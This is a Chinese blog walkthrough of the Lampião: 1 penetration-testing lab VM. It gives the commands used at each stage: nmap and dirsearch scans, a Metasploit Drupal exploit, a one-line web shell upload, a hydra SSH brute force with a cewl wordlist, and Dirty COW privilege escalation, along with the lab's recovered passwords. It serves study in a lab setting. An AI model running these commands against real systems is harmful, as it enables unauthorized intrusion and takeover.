LAMPIÃO: 1
当涉及渗透测试靶机时,一般会遵循以下基本步骤:
信息收集:在渗透测试开始之前,首先要对靶机进行信息收集。这包括扫描目标主机,识别主机上运行的服务和开放端口,以及搜集关于目标系统和网络的任何可用信息。
漏洞扫描与识别:一旦收集到关于目标主机的信息,下一步是通过漏洞扫描工具来寻找可能存在的漏洞和弱点。这可以帮助确定可能用于入侵的漏洞和安全弱点。
漏洞利用:在发现可利用的漏洞后,接下来是尝试利用这些漏洞以获取未授权访问或提升权限。这可能涉及使用特定的渗透工具或编写自定义的攻击代码。
权限维持:一旦成功入侵目标系统,接下来的目标是维持访问权限并确保持久性。这可能包括获取管理员权限、隐藏攻击活动的痕迹,以及在系统上设置后门或恶意脚本。
仅供学习和交流,内容来源于网络。
一. 信息收集
1.扫描目标主机IP地址,已知mac
00:0C:29:A5:91:14
nmap -sP 10.4.7.0/24
得到目标主机IP 10.4.7.131
- 通过mac找到靶机IP
2.确定目标服务器开放的端口以及运行的服务
namp
-A(全面扫描)
-p(全端口扫描)
-sC(使用默认脚本)
-sS(SYN半连接扫描)
-Pn(跳过主机发现扫描)
-T4(扫描速度四挡)
nmap -A -p- -sC -sS -Pn -T4 10.4.7.131
- 查看靶机网站
3.收集指纹信息
收集指纹信息(服务器类型,组件名称,组件版本)
nikto -h http://10.4.7.131:1898
服务器指纹信息指的是服务器软件和相关技术的特征和识别信息。它可以帮助安全专业人员、系统管理员以及攻击者确定目标服务器所使用的操作系统、Web服务器、数据库等软件的类型和版本,从而进行相关的漏洞利用、配置审计和安全评估。
以下是服务器指纹信息的一些常见示例:
操作系统:服务器指纹信息可以揭示目标服务器所运行的操作系统,如Windows、Linux、Unix、FreeBSD等。这种信息对于选择特定的漏洞利用和攻击技术非常重要。
Web服务器:服务器指纹信息可以揭示目标服务器所使用的Web服务器软件,如Apache HTTP Server、Nginx、Microsoft IIS、Lighttpd等。这些软件有不同的配置 和漏洞特性,攻击者可以利用这些信息来选择合适的攻击方法。
应用服务器:一些Web应用程序可能会使用特定的应用服务器,如Tomcat、Node.js、Jboss等。服务器指纹信息可以透露目标服务器上正在运行的应用服务器的类型和版 本。
数据库:服务器指纹信息可以显示目标服务器上运行的数据库软件,如MySQL、Oracle、Microsoft SQL Server等。攻击者可以根据这些信息来选择针对特定数据库软件 的攻击方法。
4.敏感目录扫描
dirsearch -u http://10.4.7.131:1898
只要200状态码
dirsearch -i 200 -u http://10.4.7.131:1898
敏感目录扫描是一种渗透测试方法,用于检测目标网站中可能存在的敏感目录或文件。这些敏感目录或文件可能包含敏感信息、配置文件、备份文件、未授权访问的文件等,如果恶意用户能够访问到这些目录或文件,可能导致安全风险和数据泄露。
以下是敏感目录扫描的一般步骤和注意事项:
收集网站信息:了解目标网站的结构、目录和文件命名规则,可以通过搜索引擎、Web目录爬行工具等方式来收集信息。
构建字典:根据收集的信息,构建一个包含常见敏感目录和文件名的字典。一些常见的目录名包括"admin"、“wp-admin”、“backup”、"upload"等。
使用扫描工具:使用专门的敏感目录扫描工具,如DirBuster、Dirsearch、Gobuster等,将字典作为输入,对目标网站进行扫描。这些工具会尝试访问目标网站中的每个 目录和文件,看是否能够访问到敏感目录或文件。
结果分析:分析扫描结果,查看是否发现了敏感目录或文件。检查这些目录或文件的权限和访问控制,确保其不会被未经授权的访问。
需要注意的是,在进行敏感目录扫描时,应该遵循合法、授权的原则。只应在合规和授权范围内的网络环境中进行扫描活动,以避免违反法律和道德准则。确保获得相关授权、 权限和审批,避免对目标系统造成未经授权的影响。
5.查看robots.txt
robots.txt是一个文本文件,用于指示网络爬虫(机器人)如何爬取和索引网站内容。它位于网站的根目录下,常用于告诉搜索引擎哪些页面可以被爬取和索引,哪些页面应该被忽略,以下是一部分节选。
User-agent: *
Crawl-delay: 10
# CSS, JS, Images
Allow: /misc/*.css$
Allow: /misc/*.css?
Allow: /themes/*.png
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
6.web应用指纹
Web应用指纹是对一个Web应用的特征和识别信息进行识别和描述的过程。它的作用是帮助安全专业人员和攻击者确定目标Web应用的技术堆栈、版本和配置,从而进行更有针对性的渗透测试、漏洞利用和安全评估。
http://10.4.7.131://UPGRADE.TXT
二. 漏洞扫描与识别
1.drupal专业扫描器
- 使用docker
git clone https://github.com/droope/droopescan.git
##git clone https://gitclone.com/github.com/SamJoan/droopescan.git
cd droopescan
docker build -t droope/droopescan .
# 显示帮助信息
docker run --rm droope/droopescan
# 扫描Drupal演示站点
docker run --rm droope/droopescan scan drupal -u https://drupal.example.com
2.查找漏洞
1. 可以通过exploit-db.com搜索drupal的漏洞
- 数据库配置文件的一般位置
2. 也可以使用msf
Msf(Metasploit Framework)是一个广泛使用的开源渗透测试框架,可用于发现、评估和利用计算机系统中的安全漏洞。Msf提供了丰富的工具和模块,使渗透测试人员能够进行全面的安全评估和攻击模拟。
以下是一些Msf的常用功能和用法:
- 漏洞扫描和验证:Msf提供了多种漏洞扫描工具和模块,可用于发现目标系统上的漏洞。通过使用这些模块,渗透测试人员可以扫描目标系统的开放端口、识别运行的服务、检查已知的漏洞等。
- 漏洞利用:Msf具备强大的漏洞利用能力,包括自动化的漏洞利用工具和模块。渗透测试人员可以使用这些工具和模块来利用已知的漏洞,进一步测试目标系统的安全性,例如获取系统权限、执行远程命令等。
- Shell命令执行:Msf允许渗透测试人员执行各种系统命令和脚本,以在受攻击主机上实现特定的操作。通过与目标主机建立反向Shell会话,渗透测试人员可以在目标系统上执行命令,探测系统的环境和配置等。
- Payload生成:Msf提供了灵活的Payload生成器,可以为特定攻击场景生成恶意代码。这些Payload可以用于注入到漏洞利用过程中,以达到渗透目标系统的目的,如远程控制、数据采集等。
- 模块化架构与可编程接口:Msf采用模块化架构,允许用户自定义和编写自己的模块,以适应不同的渗透测试需求。同时,Msf还提供强大的可编程接口,使用户可以通过编程方式与框架进行交互和扩展。
请注意,Msf是一个功能强大的渗透测试工具,仅可在合法和授权的情况下使用。滥用Msf工具进行非法活动是违法的,并可能导致法律后果。在使用Msf时,请遵循道德准则和适用的法律法规。
- msf使用
开启数据库
service postgresql start
初始化数据库
msfdb init
开启msf
msfconsole
- 查找漏洞
#查找漏洞
search drupal
使用2018-3-28漏洞
)
三.漏洞利用
1. 尝试上传木马
- 设置要攻击的地址和端口,run
-
编辑,上传一句话木马
2 . 使用中国蚁剑进行连接
- 进入数据库寻找用户名密码
得到数据库账号密码
drupaluser
Virgulino
- 进入靶机数据库
- 得到用户名
3. 进入ssh
1.使用获得的数据库账号和密码可以直接进入ssh
2. 暴力破解
- cewl是一个开源的密码爬虫工具,它可以根据指定的网站或文本文件生成自定义字典文件。cewl通过分析网页的内容,提取其中的关键词、短语和特定模式,然后根据这些提取的信息生成一个密码字典,用于密码破解、渗透测试和安全评估。
- 通过cewl爬取靶机获得一个密码字典,保存为guesspwd
cewl http://10.4.7.131:1898/ -w guesspwd.txt
因为已知账号,我们使用hydra工具爆破
-
Hydra是一个强大的网络登录破解工具,用于自动化地进行密码破解攻击。它支持多种协议和服务,包括SSH、FTP、HTTP、SMTP等。Hydra的主要功能是尝试使用不同的用户名和密码组合来进行暴力破解或字典攻击,以获取未经授权的访问。
使用Hydra进行密码破解攻击的一般步骤如下:
- 安装和配置:首先,你需要从Hydra的官方网站或Github仓库下载并安装Hydra工具。安装完成后,你可能需要对其进行一些配置,如设置用户名和密码字典文件、指定要攻击的服务协议等。
- 选择目标:确定你要攻击的目标系统,包括目标的IP地址、端口以及使用的协议(如FTP、SSH等)。
- 准备字典:准备一个密码字典文件,其中包含可能的用户名和密码组合。你可以使用常见的密码字典文件,也可以基于目标的特征和信息自定义一个字典文件。
- 启动攻击:使用Hydra命令行工具,指定目标信息、协议、用户名字典文件、密码字典文件等参数来启动密码破解攻击。Hydra将自动进行尝试登录,并将成功的用户名和密码组合输出供进一步使用。
需要注意的是,使用Hydra进行密码破解攻击涉及到合法性和道德问题。除非你有明确的授权或在合法的渗透测试环境下使用,否则进行未经授权的密码破解是非法的,可能导致法律责任。强烈建议遵守法律法规,仅在合法和授权的范围内使用Hydra工具。
hydra -l tiago -P guesspwd.txt -vV -e ns 10.4.7.131 ssh
- 破解成功
获得root权限
1.脏牛提权
脏牛(Dirty COW)是一个广为人知的Linux内核漏洞,其漏洞编号为CVE-2016-5195。该漏洞允许普通用户获取对于只读映射文件的写访问权限,从而使其能够提升权限并执行恶意操作。
脏牛漏洞的原理涉及到Linux内核中的写时复制(Copy-On-Write)机制。当多个进程同时对一个内存页面进行读操作时,内核会为每个进程创建一个只读映射的副本。然而,脏牛漏洞利用了一个设计不当的情况,当进程尝试写入这个页面时,内核不会检查其权限,导致攻击者可以修改只读映射文件。
利用脏牛漏洞的攻击步骤通常包括以下几个阶段:
- 找到目标:攻击者需要获取目标系统的本地访问权限,通常以普通用户的身份登录。
- 编写恶意代码:攻击者会编写一个专门利用脏牛漏洞的恶意代码,这段代码会通过修改只读映射文件来获取权限提升。
- 执行恶意代码:攻击者可以使用不同的技术手段(如编译执行代码或提权脚本)来执行编写的恶意代码。
- 提升权限:通过利用脏牛漏洞,恶意代码会修改只读映射文件并获取Root权限。
为了防范脏牛漏洞的利用,建议系统管理员和用户采取以下措施:
- 及时更新:确保系统内核和软件始终保持最新的安全补丁和更新,因为许多Linux发行版已发布了修复脏牛漏洞的补丁。
- 审查权限:限制普通用户对系统的访问权限,并确保他们不具备修改系统文件和映射文件的能力。
- 强密码策略:使用强密码,并定期更换密码,以防止攻击者通过猜测密码的方式获取系统访问权限。
- 监控系统:定期检查日志和监控系统,以检测任何异常活动并及时采取措施。
- 安全意识培训:提供安全意识培训,教育用户避免点击恶意链接、下载未知软件等不安全行为。
请注意,在合法授权范围内使用脏牛漏洞以进行渗透测试是允许的,但在未授权的情况下利用该漏洞是非法行为。要遵守适用法律和道德准则,并确保仅在合法和授权的环境中使用这些知识。
searchsploit dirty
使用数据库密码可以进入ssh
- 下载漏洞检测脚本并修改执行权限
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
- 运行脚本,查看所存在的漏洞
- 我们选择这个漏洞
- 上传cpp文件
#编译
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
- 运行
- 得到root密码
dirtyCowFun
- 进入root得到flag
速通
nmap -sP 10.4.7.0/24
nmap -A -p- -sC -sS -Pn -T4 10.4.7.131
docker run --rm droope/droopescan scan drupal -u https://10.4.7.131/1898
service postgresql start
msfdb init
msfconsole
search drupal
#上传木马 蚁剑连接 得到username
cewl http://10.4.7.131:1898/ -w guesspwd.txt
hydra -l tiago -P guesspwd.txt -vV -e ns 10.4.7.131 ssh #进入ssh
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
./les.sh
#上传漏洞文件并编译运行
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
#得到root
标签:10.4,密码,扫描,实践,LAMPI,目标,漏洞,权限
From: https://www.cnblogs.com/W-xzg/p/17517289.html